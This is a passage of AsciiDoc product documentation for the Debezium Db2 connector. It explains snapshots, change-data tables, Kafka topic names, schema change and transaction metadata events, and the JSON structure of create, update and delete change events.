can react to each row-level change event.\n\nTypically, the database administrator puts a table into capture mode in the middle of the life of a table. This means that the connector does not have the complete history of all changes that have been made to the table. Therefore, when the Db2 connector first connects to a particular Db2 database, it starts by performing a _consistent snapshot_ of each table that is in capture mode. After the connector completes the snapshot, the connector streams change events from the point at which the snapshot was made. In this way, the connector starts with a consistent view of the tables that are in capture mode, and does not drop any changes that were made while it was performing the snapshot.\n\n{prodname} connectors are tolerant of failures. As the connector reads and produces change events, it records the log sequence number (LSN) of the change-data table entry. The LSN is the position of the change event in the database log. If the connector stops for any reason, including communication failures, network problems, or crashes, upon restarting it continues reading the change-data tables where it left off. This includes snapshots. That is, if the snapshot was not complete when the connector stopped, upon restart the connector begins a new snapshot.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-db2-connectors-work\n\/\/ Title: How {prodname} Db2 connectors work\n[[how-the-db2-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Db2 connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and handles schema changes.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-db2-connectors-perform-database-snapshots[]\n* xref:how-debezium-db2-connectors-read-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-db2-change-event-records[]\n* xref:about-the-debezium-db2-connector-schema-change-topic[]\n* xref:debezium-db2-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-db2-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} Db2 connectors perform database snapshots\n[[db2-snapshots]]\n=== Snapshots\n\nDb2`s replication feature is not designed to store the complete history of database changes. Consequently, when a {prodname} Db2 connector connects to a database for the first time, it takes a consistent snapshot of tables that are in capture mode and streams this state to Kafka. This establishes the baseline for table content.\n\nBy default, when a Db2 connector performs a snapshot, it does the following:\n\n. Determines which tables are in capture mode, and thus must be included in the snapshot. By default, all non-system tables are in capture mode. Connector configuration properties, such as `table.exclude.list` and `table.include.list` let you specify which tables should be in capture mode.\n. Obtains a lock on each of the tables in capture mode. This ensures that no schema changes can occur in those tables during the snapshot.\nThe level of the lock is determined by the `snapshot.isolation.mode` connector configuration property.\n. Reads the highest (most recent) LSN position in the server's transaction log.\n. Captures the schema of all tables that are in capture mode. The connector persists this information in its internal database history topic.\n. Optional, releases the locks obtained in step 2. Typically, these locks are held for only a short time.\n. At the LSN position read in step 3, the connector scans the capture mode tables as well as their schemas. During the scan, the connector:\n.. Confirms that the table was created before the start of the snapshot. If it was not, the snapshot skips that table. After the snapshot is complete, and the connector starts emitting change events, the connector produces change events for any tables that were created during the snapshot.\n.. Produces a _read_ event for each row in each table that is in capture mode. All _read_ events contain the same LSN position, which is the LSN position that was obtained in step 3.\n.. Emits each _read_ event to the Kafka topic that has the same name as the table.\n. Records the successful completion of the snapshot in the connector offsets.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} Db2 connectors read change-data tables\n[id=\"how-debezium-db2-connectors-read-change-data-tables\"]\n=== Change-data tables\n\nAfter a complete snapshot, when a {prodname} Db2 connector starts for the first time, the connector identifies the change-data table for each source table that is in capture mode. The connector does the following for each change-data table:\n\n. Reads change events that were created between the last stored, highest LSN and the current, highest LSN.\n. Orders the change events according to the commit LSN and the change LSN for each event. This ensures that the connector emits the change events in the order in which the table changes occurred.\n. Passes commit and change LSNs as offsets to Kafka Connect.\n. Stores the highest LSN that the connector passed to Kafka Connect.\n\nAfter a restart, the connector resumes emitting change events from the offset (commit and change LSNs) where it left off. While the connector is running and emitting change events, if you remove a table from capture mode or add a table to capture mode, the connector detects this and modifies its behavior accordingly.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-db2-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Db2 change event records\n[[db2-topic-names]]\n=== Topic names\n\nBy default, the Db2 connector writes change events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topic has the following format:\n\n_databaseName_._schemaName_._tableName_\n\n_databaseName_:: The logical name of the connector as specified with the `database.server.name` connector configuration property.\n\n_schemaName_:: The name of the schema in which the operation occurred.\n\n_tableName_:: The name of the table in which the operation occurred.\n\nFor example, consider a Db2 installation with the `mydatabase` database, which contains four tables: `PRODUCTS`, `PRODUCTS_ON_HAND`, `CUSTOMERS`, and `ORDERS` that are in the `MYSCHEMA` schema. The connector would emit events to these four Kafka topics:\n\n* `mydatabase.MYSCHEMA.PRODUCTS`\n* `mydatabase.MYSCHEMA.PRODUCTS_ON_HAND`\n* `mydatabase.MYSCHEMA.CUSTOMERS`\n* `mydatabase.MYSCHEMA.ORDERS`\n\nTo configure a Db2 connector to emit change events to differently-named Kafka topics, see the documentation for the {link-prefix}:{link-topic-routing}#topic-routing[topic routing transformation].\n\n\/\/ Type: concept\n\/\/ Title: About the {prodname} Db2 connector schema change topic\n[id=\"about-the-debezium-db2-connector-schema-change-topic\"]\n=== Schema change topic\n\nFor a table that is in capture mode, the {prodname} Db2 connector stores the history of schema changes to that table in a database history topic. This topic reflects an internal connector state and you should not use it. If your application needs to track schema changes, there is a public schema change topic. The name of the schema change topic is the same as the logical server name specified in the connector configuration.\n\n[WARNING]\n====\nThe format of messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when:\n\n* A new table goes into capture mode.\n* A table is removed from capture mode.\n* During a {link-prefix}:{link-db2-connector}#db2-schema-evolution[database schema update], there is a change in the schema for a table that is in capture mode.\n\nA message to the schema change topic contains a logical representation of the table schema, for example:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"db2\",\n \"ts_ms\": 1588252618953,\n \"snapshot\": \"true\",\n \"db\": \"testdb\",\n \"schema\": \"DB2INST1\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"databaseName\": \"TESTDB\", \/\/ <1>\n \"schemaName\": \"DB2INST1\",\n \"ddl\": null, \/\/ <2>\n \"tableChanges\": [ \/\/ <3>\n {\n \"type\": \"CREATE\", \/\/ <4>\n \"id\": \"\\\"DB2INST1\\\".\\\"CUSTOMERS\\\"\", \/\/ <5>\n \"table\": { \/\/ <6>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <7>\n \"ID\"\n ],\n \"columns\": [ \/\/ <8>\n {\n \"name\": \"ID\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"FIRST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"LAST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"EMAIL\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,3,6\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|2\n|`ddl`\n|Always `null` for the Db2 connector. For other connectors, this field contains the DDL responsible for the schema change. This DDL is not available to Db2 connectors.\n\n|3\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|4\n|`type`\na|Describes the kind of change. The value is one of the following:\n\n* `CREATE` - table created\n* `ALTER` - table modified\n* `DROP` - table deleted\n\n|5\n|`id`\n|Full identifier of the table that was created, altered, or dropped.\n\n|6\n|`table`\n|Represents table metadata after the applied change.\n\n|7\n|`primaryKeyColumnNames`\n|List of columns that compose the table's primary key.\n\n|8\n|`columns`\n|Metadata for each column in the changed table.\n\n|===\n\nIn messages to the schema change topic, the key is the name of the database that contains the schema change. In the following example, the `payload` field contains the key:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"databaseName\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.SchemaChangeKey\"\n },\n \"payload\": {\n \"databaseName\": \"TESTDB\"\n }\n}\n----\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} Db2 connector-generated events that represent transaction boundaries\n[[db2-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich change data event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from the given data collection\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"testDB.dbo.tablea\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"testDB.dbo.tableb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nThe connector emits transaction events to the `_database.server.name_.transaction` topic.\n\n.Data change event enrichment\n\nWhen transaction metadata is enabled the connector enriches the change event `Envelope` with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"00000025:00000d08:0025\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Db2 connector data change events\n[[db2-events]]\n== Data change events\n\nThe {prodname} Db2 connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-db2-connector}#db2-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-db2-connector}#db2-topic-names[topic names].\n\n[WARNING]\n====\nThe {prodname} Db2 connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n\nAlso, Db2 names for databases, schemas, and tables can be case sensitive. This means that the connector could emit event records for more than one table to the same Kafka topic.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-db2-change-events[]\n* xref:about-values-in-debezium-db2-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-db2-change-events\n\/\/ Title: About keys in {prodname} db2 change events\n[[db2-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [ \/\/ <2>\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n }\n ],\n \"optional\": false, \/\/ <3>\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Key\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"ID\": 1004\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`mydatabase.MYSCHEMA.CUSTOMERS.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +\n\n* `mydatabase` is the name of the connector that generated this event. +\n* `MYSCHEMA` is the database schema that contains the table that was changed. +\n* `CUSTOMERS` is the table that was updated.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `ID` field whose value is `1004`.\n\n|===\n\n\/\/\/\/\n[NOTE]\n====\nAlthough the `column.exclude.list` connector configuration property allows you to omit columns from event values, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\/\/\/\/\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-db2-change-events\n\/\/ Title: About values in {prodname} Db2 change events\n[[db2-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\nThe event value portion of every change event for the `customers` table specifies the same schema. The event value's payload varies according to the event type:\n\n* <<db2-create-events,_create_ events>>\n* <<db2-update-events,_update_ events>>\n* <<db2-delete-events,_delete_ events>>\n\n[[db2-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"change_lsn\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"commit_lsn\"\n },\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729468470,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000758:0003\",\n \"commit_lsn\": \"00000027:00000758:0005\",\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559729471739 \/\/ <10>\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mydatabase.MYSCHEMA.CUSTOMERS.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. The connector uses this schema for all rows in the `MYSCHEMA.CUSTOMERS` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.db2.Source` is the schema for the payload's `source` field. This schema is specific to the Db2 connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`mydatabase.MYSCHEMA.CUSTOMERS.Envelope` is the schema for the overall structure of the payload, where `mydatabase` is the database, `MYSCHEMA` is the schema, and `CUSTOMERS` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that JSON representations of events are much larger than the rows they describe. This is because a JSON representation must include the schema portion and the payload portion of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\n|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `ID`, `FIRST_NAME`, `LAST_NAME`, and `EMAIL` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. The `source` structure shows Db2 information about this change, which provides traceability. It also has information you can use to compare to other events in the same topic or in other topics to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[[db2-update-events]]\n=== _update_ events\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the _update_ event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"after\": { \/\/ <2>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729995937,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000ac0:0002\",\n \"commit_lsn\": \"00000027:00000ac0:0007\",\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1559729998706 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, note that the `EMAIL` value is `john.doe@example.com`.\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `EMAIL` value is now `noreply@example.com`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure contains the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has different LSNs. You can use this information to compare this event to other events to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-db2-connector}#db2-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row.\n====\n\n[[db2-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The event value `payload` in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"noreply@example.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559730445243,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000db0:0005\",\n \"commit_lsn\": \"00000027:00000db0:0007\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1559730450205 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and LSN field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nDb2 connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[db2-tombstone-events]]\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s Db2 connector emits a _delete_ event, the connector emits a special 